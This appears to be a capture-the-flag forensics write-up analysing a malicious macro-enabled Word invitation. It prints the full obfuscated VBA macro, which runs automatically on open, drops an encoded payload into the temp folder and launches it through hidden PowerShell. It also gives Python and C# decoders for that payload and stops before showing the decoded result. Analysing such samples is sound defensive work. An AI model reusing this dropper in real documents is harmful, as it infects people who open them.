Hack The Boo - Forensics - Halloween Invitation
Difficulty: Easy
An email notification pops up. It’s from your theater group. Someone decided to throw a party. The invitation looks awesome, but there is something suspicious about this document. Maybe you should take a look before you rent your banana costume.
We are provided with a macro-enabled word document, invitation.docm.
.docm files are .docx files, but with macros enabled. If this is a simple invitation, it shouldn’t need macros, so we’ll likely find some malware hidden within the macros of this document.
.docm and .docx files are types of Open Document Format files, and are really zip archives containing the document’s component parts. We can use any “zip” program to unzip them and explore their contents.
Once extracted, we can find the compiled macros in invitation.docm/word/vbaProject.bin. These macros use Visual Basic for Applications (VBA), and we’ll need to use a tool to extract them so that we can see them. I chose to use oletools.
sudo -H pip install -U oletools[full]
The output of the following command will show us the macro code:
olevba invitation.docm/word/vbaProject.bin -c --decode
I copied and pasted that code from my terminal window into a text editor for analysis.
Sub AutoOpen()
    odhsjwpphlxnb
    Call lmavedb
End Sub
Private Sub odhsjwpphlxnb()
    Dim bnhupraoau As String
    CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
    bnhupraoau = sryivxjsdncj()
    dropPath = Environ("TEMP")
    Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374"))
    Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)
    dfdjqgaqhvxxi.Write bnhupraoau
    dfdjqgaqhvxxi.Close
End Sub
Private Function wdysllqkgsbzs(strBytes) As String
    Dim aNumbers
    Dim fxnrfzsdxmcvranp As String
    Dim iIter
    fxnrfzsdxmcvranp = ""
    aNumbers = Split(strBytes)
    For iIter = LBound(aNumbers) To UBound(aNumbers)
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
    Next
    wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function
Private Function okbzichkqtto() As String
    Dim fxnrfzsdxmcvranp As String
    fxnrfzsdxmcvranp = ""
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") & uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") & uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") & uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") & uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") & uxdufnkjlialsyp("3130203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") & uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") & uxdufnkjlialsyp("38203635203835"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") & uxdufnkjlialsyp("203635203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") & uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") & uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") & uxdufnkjlialsyp("3635203731203831203635203738203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") & uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") & uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") & uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") & uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") & uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") & uxdufnkjlialsyp("37203635203732"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") & uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") & uxdufnkjlialsyp("37203635203930203831203636203637"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") & uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") & uxdufnkjlialsyp("203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") & uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") & uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") & uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") & uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") & uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3637") & uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") & uxdufnkjlialsyp("373120383520363520313031"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") & uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") & uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") & uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") & uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") & uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") & uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") & uxdufnkjlialsyp("203733"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") & uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") & uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") & uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") & uxdufnkjlialsyp("3635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") & uxdufnkjlialsyp("3831203635203733203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") & uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") & uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") & uxdufnkjlialsyp("20313033"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") & uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") & uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") & uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") & uxdufnkjlialsyp("203836203635203636"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") & uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") & uxdufnkjlialsyp("20313033203635203637203438"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") & uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313032") & uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") & uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") & uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") & uxdufnkjlialsyp("3635203631"))
    okbzichkqtto = fxnrfzsdxmcvranp
End Function
Private Function sryivxjsdncj() As String
    Dim fxnrfzsdxmcvranp As String
    fxnrfzsdxmcvranp = ""
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto()
    sryivxjsdncj = fxnrfzsdxmcvranp
End Function
Sub lmavedb()
    dropPath = Environ("TEMP")
    Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("536372697074696e672e46696c6553797374") & uxdufnkjlialsyp("656d4f626a656374"))
    Set ktmlmpc = rxnnvnfqufrzqfhnff.OpenTextFile(dropPath & uxdufnkjlialsyp("5c68") & uxdufnkjlialsyp("6973746f72792e62616b"))
    secret = ktmlmpc.ReadAll
    ktmlmpc.Close
    Code = "powershell -WindowStyle hidden -e """ & secret
    x = Shell(Code, 1)
End Sub
Function uxdufnkjlialsyp(ByVal tiyrahvbz As String) As String
    Dim nqjveawetp As Long
    For nqjveawetp = 1 To Len(tiyrahvbz) Step 2
    uxdufnkjlialsyp = uxdufnkjlialsyp & Chr$(Val("&H" & Mid$(tiyrahvbz, nqjveawetp, 2)))
    Next nqjveawetp
End Function
The last function - uxdufnkjlialsyp - was actually in a separate file, but I appended it to the end of this file for easier analysis.
We can see that the extracted code involves quite a bit of obfuscation to hide its true purpose, so it looks like we are on the right track. The AutoOpen() subroutine runs automatically when the document is opened with macros enabled, and it triggers the rest of the code.
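The two helpers that undo this obfuscation are short enough to reimplement directly. The Python deobfuscator below is an added example, not part of this writeup or the challenge files: it reproduces the hex stage (uxdufnkjlialsyp) and the char-code stage (wdysllqkgsbzs), rewrites each obfuscated VBA line into a readable one, concatenates the fragments that okbzichkqtto() assembles, and decodes the result as the base64-encoded UTF-16LE text that `powershell -e` expects. The sample lines are copied from the olevba output above; only the first payload line is included, so the recovered script is just its opening fragment.

```python
import base64
import re

# Names of the two decoding helpers exactly as they appear in the olevba output above.
HEX_FN = "uxdufnkjlialsyp"   # stage 1: hex string -> text, two hex digits per character
CODES_FN = "wdysllqkgsbzs"   # stage 2: "74 65 66 ..." (space-separated decimal codes) -> text


def hex_to_str(hexstr: str) -> str:
    """Stage 1, equivalent to Chr$(Val("&H" & pair)) for every two-character pair."""
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def charcodes_to_str(codes: str) -> str:
    """Stage 2, equivalent to Split() on spaces followed by Chr() of each decimal code."""
    return "".join(chr(int(tok)) for tok in codes.split())


_HEX_CALL = re.compile(HEX_FN + r'\("([0-9A-Fa-f]*)"\)')
_CODES_CALL = re.compile(CODES_FN + r'\("([0-9 ]*)"\)')


def decode_line(line: str) -> str:
    """Rewrite one VBA line so its obfuscated arguments become plain string literals:
    inline each hex call, fold VBA's "a" & "b" into "ab", then inline the char-code call."""
    line = _HEX_CALL.sub(lambda m: '"' + hex_to_str(m.group(1)) + '"', line)
    # Only adjacent literals are merged; an unquoted operand such as `dropPath & "..."` is left alone.
    line = re.sub(r'"\s*&\s*"', "", line)
    return _CODES_CALL.sub(lambda m: '"' + charcodes_to_str(m.group(1)) + '"', line)


def recover_payload(vba_source: str) -> str:
    """Concatenate, in source order, every fragment that okbzichkqtto() appends to its
    accumulator; this is the string the macro writes to %TEMP%\\history.bak."""
    parts = []
    for line in vba_source.splitlines():
        if "fxnrfzsdxmcvranp + " + CODES_FN + "(" in line:
            literal = re.search(r'"([^"]*)"\s*$', decode_line(line))
            parts.append(literal.group(1))
    return "".join(parts)


def decode_encoded_command(b64: str) -> str:
    """lmavedb() hands the dropped string to `powershell -e`, which expects base64 of
    UTF-16LE text. Padding is restored and a dangling odd byte is dropped so that a
    partial fragment (a single source line of the payload) still decodes."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw[: len(raw) // 2 * 2].decode("utf-16-le")


# Constructed sample: three lines copied from the macro listing above (only the first
# payload line, so the recovered script is just its opening fragment).
SAMPLE_MACRO = r'''
    Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374"))
    Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
'''


if __name__ == "__main__":
    for line in SAMPLE_MACRO.strip("\n").splitlines():
        print(decode_line(line))
    payload = recover_payload(SAMPLE_MACRO)
    print("dropped string starts:", payload)
    print("PowerShell starts:", decode_encoded_command(payload))
```

Run it against the full olevba output (every `fxnrfzsdxmcvranp + wdysllqkgsbzs(` line) to recover the complete encoded command instead of the fragment shown here.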
I am not as familiar with Visual Basic, or VBA, so after a few attempts to get blocks of this code to run in Visual Studio (with dangerous parts commented out), I decided instead to re-write the code in a language that I am more familiar with - C#. This is what I came up with:
using System;
using System.Text;
string DecodeBase64(string input)
{
    byte[] data = Convert.FromBase64String(input);
    return Encoding.UTF8.GetString(data);
}
string ConvertHexToCharacterCodes(string input)
{
    StringBuilder returnMe = new StringBuilder();
    // For each 2 characters in the input, parse them as an int, and then convert that to a character
    for(int x = 0; x < input.Length; x+=2)
    {
        // Get a chunk of 2 characters
        string section = input.Substring(x,2);
        // Parse them as an int
        byte sectionInt = byte.Parse(section, System.Globalization.NumberStyles.HexNumber);
        // Convert to characters = equivalent of VBA's Chr() function.
        string parsedChars = System.Text.Encoding.ASCII.GetString(new byte[] { sectionInt });
        returnMe.Append(parsedChars);
    }
    return returnMe.ToString();
}
string ConvertCharacterCodesToStrings(string input)
{
    // This will receive a string containing ANSI character codes, space separated.
    string[] explodedString = input.Split(' ');
    StringBuilder returnMe = new StringBuilder();
    foreach(string s in explodedString)
    {
        //int parsedCharCode = int.Parse(s);
        byte parsedCharCodeByte = byte.Parse(s);
        string parsedChar = System.Text.Encoding.ASCII.GetString(new byte[] { parsedCharCodeByte });
        returnMe.Append(parsedChar);
    }
    return returnMe.ToString();
}
string payload1 = "";
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3734203635203636203132322036352036382034382036352037342031") + ConvertHexToCharacterCodes("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520313230203635203638203130") + ConvertHexToCharacterCodes("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3635203638203635203635203734") + ConvertHexToCharacterCodes("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") + ConvertHexToCharacterCodes("37203438203635203737203635203635203438203635203638203737203635203930"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("313033203635203132312036352036382038312036352037372036352036352035") + ConvertHexToCharacterCodes("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") + ConvertHexToCharacterCodes("3130203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") + ConvertHexToCharacterCodes("36352031313820363520363720353620363520373420313139203635203535203635203637203831"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") + ConvertHexToCharacterCodes("38203635203835"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") + ConvertHexToCharacterCodes("203635203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("313033203635203637203438203635203836203831203636203132322036352037312038") + ConvertHexToCharacterCodes("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") + ConvertHexToCharacterCodes("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") + ConvertHexToCharacterCodes("3635203731203831203635203738203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520313232203635203731203733203635") + ConvertHexToCharacterCodes("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") + ConvertHexToCharacterCodes("20313033203635203639203635203635203130312031313920363520313035203635203639"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363920363520313030203831203636203438203635203731203130332036352039") + ConvertHexToCharacterCodes("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520393720383120363620") + ConvertHexToCharacterCodes("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("313139203636203131312036352037312031303720363520393820363520363620313038") + ConvertHexToCharacterCodes("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") + ConvertHexToCharacterCodes("37203635203732"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") + ConvertHexToCharacterCodes("20363520373120383520363520393920313139203636203438203635203639203438203635203930"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") + ConvertHexToCharacterCodes("37203635203930203831203636203637"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") + ConvertHexToCharacterCodes("37322037332036352039392031313920363620313132203635203731"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") + ConvertHexToCharacterCodes("203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("37342036352036362031323220363520363720") + ConvertHexToCharacterCodes("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") + ConvertHexToCharacterCodes("2037312038352036352039392031303320363620313232203635203637"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("36352036352038312036352036362035352036352036372037332036352038") + ConvertHexToCharacterCodes("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("383120363620353420363520373120363920363520") + ConvertHexToCharacterCodes("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("31313220363520373220343820363520") + ConvertHexToCharacterCodes("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3637") + ConvertHexToCharacterCodes("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") + ConvertHexToCharacterCodes("373120383520363520313031"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("36352036352031303320") + ConvertHexToCharacterCodes("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") + ConvertHexToCharacterCodes("363720363520363520383520313139203636203438203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") + ConvertHexToCharacterCodes("36352037322037332036352039382031313920363620313231203635203730203839"));
